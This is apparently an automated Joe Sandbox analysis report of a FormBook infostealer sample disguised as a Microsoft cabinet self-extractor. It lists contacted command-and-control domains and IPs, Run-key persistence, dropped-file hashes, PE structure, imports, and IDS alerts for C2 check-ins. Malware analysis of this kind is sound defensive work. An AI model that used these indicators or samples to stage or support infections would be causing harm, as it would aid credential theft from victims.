http://www.cosmosmeta.com/q36s/?1bGpqN=YsZgiMyir4QObMcXj4/OoGvu8CzjTsx3cWH2zl5uagrD8+tBN1FIEP+EOGgFqY0IHdLq&wFNT8=0jNDXxTXR8rtijfp	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.searchvity.com/	control.exe, 0000000B.00000002.821918860.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.searchvity.com/?dn=	control.exe, 0000000B.00000002.821918860.00000000054F2000.00000004.10000000.00040000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.perfectselfstorageaston.com	control.exe, 0000000B.00000002.822337905.0000000005B6B000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
52.20.84.62	www.cosmosmeta.com	United States	14618	AMAZON-AESUS	false
213.186.33.5	www.okargo.pro	France	16276	OVHFR	false
162.0.233.84	www.fraiuhs.com	Canada	22612	NAMECHEAP-NETUS	false
18.194.171.90	www.getbraintruth.com	United States	16509	AMAZON-02US	false
106.186.69.5	yokoi-tatami-lab.com	Japan	2516	KDDIKDDICORPORATIONJP	false
134.122.133.172	ifsay8jx7m.hellomyai.com	United States	64050	BCPL-SGBGPNETGlobalASNSG	false
217.160.0.132	www.marketplaceimmo.com	Germany	8560	ONEANDONE-ASBrauerstrasse48DE	false
74.208.236.190	www.unitedtrials.net	United States	8560	ONEANDONE-ASBrauerstrasse48DE	false
101.35.123.80	www.oooci.com	China	132203	TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN	false
66.96.160.139	www.perfectselfstorageaston.com	United States	29873	BIZLAND-SDUS	false
185.215.4.12	www.flat-planet.com	Denmark	50129	TVHORADADAES	false
34.102.136.180	gestaltants.com	United States	15169	GOOGLEUS	false
104.21.36.34	www.computershit.net	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	569293
Start date:	09.02.2022
Start time:	13:04:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/8@30/14
EGA Information:	Successful, ratio: 80%
HDC Information:	Successful, ratio: 58.8% (good quality ratio 52.9%) Quality average: 72.1% Quality standard deviation: 32%
HCA Information:	Successful, ratio: 100% Number of executed functions: 128 Number of non-executed functions: 177
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Override analysis time to 240s for rundll32

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, consent.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, HxTsr.exe, WMIADAP.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 184.30.21.144
Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Execution Graph export aborted for target d6wtv4o01bbhxt.exe, PID 1140 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
13:05:07	API Interceptor	2x Sleep call for process: image.exe modified
13:08:43	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MRLH6T C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
13:08:52	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MRLH6T C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\d6wtv4o01bbhxt.exe.log

Download File

Process:	C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	142
Entropy (8bit):	5.090621108356562
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
MD5:	8C0458BB9EA02D50565175E38D577E35
SHA1:	F0B50702CD6470F3C17D637908F83212FDBDB2F2
SHA-256:	C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
SHA-512:	804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\image.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1310
Entropy (8bit):	5.345651901398759
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE47mE4Ko88:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKz6
MD5:	D918C6A765EDB90D2A227FE23A3FEC98
SHA1:	8BA802AD8D740F114783F0DADC407CBFD2A209B3
SHA-256:	AB0E9F716E31502A4C6786575C5E64DFD9D24AF99056BBE2640A2FA322CFF4D6
SHA-512:	A937ABD8294BB32A612F8B3A376C94111D688379F0A4DB9FAA2FCEB71C25E18D621EEBCFDA5706B71C8473A4F38D8B3C4005D1589B564F9B1C9C441B6D337814
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Temp\DB1

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Reputation:	unknown
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

Download File

Process:	C:\Users\user\Desktop\08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	784384
Entropy (8bit):	7.578384216240883
Encrypted:	false
SSDEEP:	12288:7zJnvBF54UIREYTnaD2+6BkV5afhXpkqOwOOcum+7vHwKaAtT1ioChdOCK:FvPaqD2Jw5aTk7wBAAtT17Chdf
MD5:	8B7BDE45C8536482F67C812C461B806D
SHA1:	3F3DC8737DE01A14E57B635E16441CBD97CFDEE4
SHA-256:	DB7B7E4D889CDF72EBAB39809281A936B0347A9374DBC145360F8B2A922F8533
SHA-512:	EBC2A395DD3C9F73FC47D6C3463B9BFC499BF87162BED463C4AB2F6D2D6DB7DF25607598C47B106475266A79542F22D36EB496EBEB3D6CD347BB73E073565666
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 44%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f...............0.................. ... ....@.. .......................`............@.....................................O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........f..\|.......Y...................................................".(.........0..+................,..r...p..+.......,..r...p....+....s....}......}.....(.......{....(f......0............{......%.o........Xo......0..;.........{....(i........,..r!..p.+.r#..p.{....(h...rC..p(.....+..n.s....}.....(........}......0............{....(h....(....(.....+..B.(........}........0..!........rG..p.\|....(.....(....(.....+....s....}.....s....}.....(........}......}......0..,...

C:\Users\user\AppData\Local\Temp\Qplltzvap\d6wtv4o01bbhxt.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	45152
Entropy (8bit):	6.149629800481177
Encrypted:	false
SSDEEP:	768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
MD5:	2867A3817C9245F7CF518524DFD18F28
SHA1:	D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
SHA-256:	43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
SHA-512:	7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........\|...P...........................................r...p(....2.(....(....z..r...p(....(....(......}......{.....s..........0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t........0..(....... ....s$........o%....X..(....-...o&....0...........('......&.........................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

\Device\ConDrv

Download File

Process:	C:\Program Files (x86)\Qplltzvap\d6wtv4o01bbhxt.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1141
Entropy (8bit):	4.44831826838854
Encrypted:	false
SSDEEP:	24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
MD5:	1AEB3A784552CFD2AEDEDC1D43A97A4F
SHA1:	804286AB9F8B3DE053222826A69A7CDA3492411A
SHA-256:	0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
SHA-512:	5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
Malicious:	false
Reputation:	unknown
Preview:	Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.828159357631684
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe
File size:	833536
MD5:	bd0bb1e8dedb72cda230e34141e562e5
SHA1:	6fbff172a218accf4b3cdd5c8c5a7ca7ae6412f5
SHA256:	9b54b87e20d735cdb5e1dfca388756e41e8a1ea72f731e2a72b16891ae80433b
SHA512:	7a35ce8659c5064d46edac7946e7e8cd2086e194033234dd16f391d28847c22143a1687d4d9549faa2139b25794ef59f613c55c50c087b4ffba0e89f0bf19e68
SSDEEP:	12288:qivy90JcG85BF94XIeEYT42r2+6Bd55gfhXovqOhOOcT7u7HMwda/tqLioCTdOCu:q4yA85PuLr2J15gGv7hBW/tqL7CTdfu
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D..e...6...6...6...7...6...7...6...7...6...7...6...6...6...7...6..o6...6...7...6Rich...6................PE..d................."

File Icon


Icon Hash:	7e72767676727274

Static PE Info

General

Entrypoint:	0x140008200
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Time Stamp:	0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	4cea7ae85c87ddc7295d39ff9cda31d1

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F8044EA9600h
dec eax
add esp, 28h
jmp 00007F8044EA8EABh
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ebx
dec eax
mov dword ptr [esp+10h], edi
inc ecx
push esi
dec eax
sub esp, 000000B0h
and dword ptr [esp+20h], 00000000h
dec eax
lea ecx, dword ptr [esp+40h]
call dword ptr [000011CDh]
nop
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ebx, dword ptr [eax+08h]
xor edi, edi
xor eax, eax
dec eax
cmpxchg dword ptr [00004922h], ebx
je 00007F8044EA8EACh
dec eax
cmp eax, ebx
jne 00007F8044EA8EBCh
mov edi, 00000001h
mov eax, dword ptr [00004918h]
cmp eax, 01h
jne 00007F8044EA8EB9h
lea ecx, dword ptr [eax+1Eh]
call 00007F8044EA9493h
jmp 00007F8044EA8F1Ch
mov ecx, 000003E8h
call dword ptr [0000117Eh]
jmp 00007F8044EA8E69h
mov eax, dword ptr [000048F6h]
test eax, eax
jne 00007F8044EA8EFBh
mov dword ptr [000048E8h], 00000001h
dec esp
lea esi, dword ptr [000013E9h]
dec eax
lea ebx, dword ptr [000013CAh]
dec eax
mov dword ptr [esp+30h], ebx
mov dword ptr [esp+24h], eax
dec ecx
cmp ebx, esi
jnc 00007F8044EA8EC7h
test eax, eax
jne 00007F8044EA8EC7h
dec eax
cmp dword ptr [ebx], 00000000h
je 00007F8044EA8EB2h
dec eax
mov eax, dword ptr [ebx]
dec eax
mov ecx, dword ptr [00001388h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa23c	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf000	0xc07a0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0xe000	0x408	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xd0000	0x20	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x9a10	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x9010	0x118	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9128	0x520	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x7b80	0x7c00	False	0.549993699597	data	6.09626178287	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x9000	0x22c8	0x2400	False	0.413628472222	data	4.72784192921	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xc000	0x1f00	0x400	False	0.3212890625	data	3.18897698451	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.pdata	0xe000	0x408	0x600	False	0.393229166667	data	3.15636650405	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xf000	0xc07a0	0xc0800	False	0.938864650974	data	7.87918299929	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xd0000	0x20	0x200	False	0.083984375	data	0.406847371581	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xfbd8	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0x129f4	0x668	data	English	United States
RT_ICON	0x1305c	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2291109880, next used block 28872	English	United States
RT_ICON	0x13344	0x1e8	data	English	United States
RT_ICON	0x1352c	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x13654	0xea8	data	English	United States
RT_ICON	0x144fc	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 15066613, next used block 15000828	English	United States
RT_ICON	0x14da4	0x6c8	data	English	United States
RT_ICON	0x1546c	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x159d4	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x233a8	0x25a8	data	English	United States
RT_ICON	0x25950	0x10a8	data	English	United States
RT_ICON	0x269f8	0x988	data	English	United States
RT_ICON	0x27380	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x277e8	0x668	data
RT_ICON	0x27e50	0x2e8	dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2156427519, next used block 0
RT_ICON	0x28138	0x128	GLS_BINARY_LSB_FIRST
RT_ICON	0x28260	0xea8	data
RT_ICON	0x29108	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16744374, next used block 16757459
RT_ICON	0x299b0	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x29f18	0x25a8	data
RT_ICON	0x2c4c0	0x10a8	data
RT_ICON	0x2d568	0x468	GLS_BINARY_LSB_FIRST
RT_DIALOG	0x2d9d0	0x2f2	data	English	Great Britain
RT_DIALOG	0x2dcc4	0x1b0	data	English	Great Britain
RT_DIALOG	0x2de74	0x166	data	English	Great Britain
RT_DIALOG	0x2dfdc	0x1c0	data	English	Great Britain
RT_DIALOG	0x2e19c	0x130	data	English	Great Britain
RT_DIALOG	0x2e2cc	0x120	data	English	Great Britain
RT_STRING	0x2e3ec	0x8c	data	English	Great Britain
RT_STRING	0x2e478	0x526	data	English	Great Britain
RT_STRING	0x2e9a0	0x5ce	data	English	Great Britain
RT_STRING	0x2ef70	0x4b0	data	English	Great Britain
RT_STRING	0x2f420	0x442	data	English	Great Britain
RT_STRING	0x2f864	0x3cc	data	English	Great Britain
RT_RCDATA	0x2fc30	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x2fc38	0x9e9ba	Microsoft Cabinet archive data, 649658 bytes, 1 file	English	Great Britain
RT_RCDATA	0xce5f4	0x4	data	English	Great Britain
RT_RCDATA	0xce5f8	0x24	data	English	Great Britain
RT_RCDATA	0xce61c	0x7	ASCII text, with no line terminators	English	Great Britain
RT_RCDATA	0xce624	0x7	ASCII text, with no line terminators	English	Great Britain
RT_RCDATA	0xce62c	0x4	data	English	Great Britain
RT_RCDATA	0xce630	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xce638	0x4	data	English	Great Britain
RT_RCDATA	0xce63c	0xa	ASCII text, with no line terminators	English	United States
RT_RCDATA	0xce648	0x4	data	English	Great Britain
RT_RCDATA	0xce64c	0x6	ASCII text, with no line terminators	English	Great Britain
RT_RCDATA	0xce654	0x7	ASCII text, with no line terminators	English	Great Britain
RT_RCDATA	0xce65c	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0xce664	0x84	data
RT_GROUP_ICON	0xce6e8	0xbc	data	English	United States
RT_VERSION	0xce7a4	0x400	data	English	United States
RT_VERSION	0xceba4	0x414	data	English	Great Britain
RT_MANIFEST	0xcefb8	0x7e6	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, LoadLibraryExA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, WaitForSingleObject, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, ExpandEnvironmentStringsA, LocalAlloc, lstrcmpA, FindNextFileA, GetCurrentProcess, FindFirstFileA, GetModuleFileNameA, GetShortPathNameA, Sleep, GetStartupInfoW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, GetTickCount, EnumResourceLanguagesA, GetDiskFreeSpaceA, MulDiv, FindClose
GDI32.dll	GetDeviceCaps
USER32.dll	ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetSystemMetrics, CallWindowProcA, SetWindowTextA, MessageBoxA, SendDlgItemMessageA, SendMessageA, GetDlgItem, DialogBoxIndirectParamA, GetWindowLongPtrA, SetWindowLongPtrA, SetForegroundWindow, ReleaseDC, EnableWindow, CharNextA, LoadStringA, CharPrevA, EndDialog, MessageBeep, ExitWindowsEx, SetDlgItemTextA, CharUpperA, GetDesktopWindow, PeekMessageA, GetDlgItemTextA
msvcrt.dll	?terminate@@YAXXZ, _commode, _fmode, _acmdln, __C_specific_handler, memset, __setusermatherr, _ismbblead, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, _XcptFilter, memcpy_s, _vsnprintf, _initterm, memcpy
COMCTL32.dll
Cabinet.dll
VERSION.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA

Version Infos

Description	Data
LegalCopyright	Microsoft Corporation. All rights reserved.
InternalName	Wextract
FileVersion	11.00.19041.1 (WinBuild.160101.0800)
CompanyName	Microsoft Corporation
ProductName	Internet Explorer
ProductVersion	11.00.19041.1
FileDescription	Win32 Cabinet Self-Extractor
OriginalFilename	WEXTRACT.EXE
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/09/22-13:06:56.743892	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.3	8.8.8.8
02/09/22-13:08:19.207209	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49832	34.102.136.180	192.168.2.3
02/09/22-13:08:24.265539	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49833	80	192.168.2.3	217.160.0.132
02/09/22-13:08:24.265539	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49833	80	192.168.2.3	217.160.0.132
02/09/22-13:08:24.265539	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49833	80	192.168.2.3	217.160.0.132
02/09/22-13:08:34.576699	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49834	80	192.168.2.3	162.0.233.84
02/09/22-13:08:34.576699	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49834	80	192.168.2.3	162.0.233.84
02/09/22-13:08:34.576699	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49834	80	192.168.2.3	162.0.233.84
02/09/22-13:08:54.019678	TCP	2031453	ET TROJAN FormBook CnC Checkin (GET)	49837	80	192.168.2.3	185.215.4.12
02/09/22-13:08:54.019678	TCP	2031449	ET TROJAN FormBook CnC Checkin (GET)	49837	80	192.168.2.3	185.215.4.12
02/09/22-13:08:54.019678	TCP	2031412	ET TROJAN FormBook CnC Checkin (GET)	49837	80	192.168.2.3	185.215.4.12

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 9, 2022 13:06:33.995755911 CET	49798	80	192.168.2.3	134.122.133.172
Feb 9, 2022 13:06:34.335182905 CET	80	49798	134.122.133.172	192.168.2.3
Feb 9, 2022 13:06:34.335447073 CET	49798	80	192.168.2.3	134.122.133.172
Feb 9, 2022 13:06:34.607599020 CET	49798	80	192.168.2.3	134.122.133.172
Feb 9, 2022 13:06:34.947375059 CET	80	49798	134.122.133.172	192.168.2.3
Feb 9, 2022 13:06:34.947403908 CET	80	49798	134.122.133.172	192.168.2.3
Feb 9, 2022 13:06:34.947421074 CET	80	49798	134.122.133.172	192.168.2.3
Feb 9, 2022 13:06:34.947575092 CET	49798	80	192.168.2.3	134.122.133.172
Feb 9, 2022 13:06:34.947676897 CET	49798	80	192.168.2.3	134.122.133.172
Feb 9, 2022 13:06:35.286979914 CET	80	49798	134.122.133.172	192.168.2.3
Feb 9, 2022 13:06:39.992625952 CET	49800	80	192.168.2.3	74.208.236.190
Feb 9, 2022 13:06:40.136081934 CET	80	49800	74.208.236.190	192.168.2.3
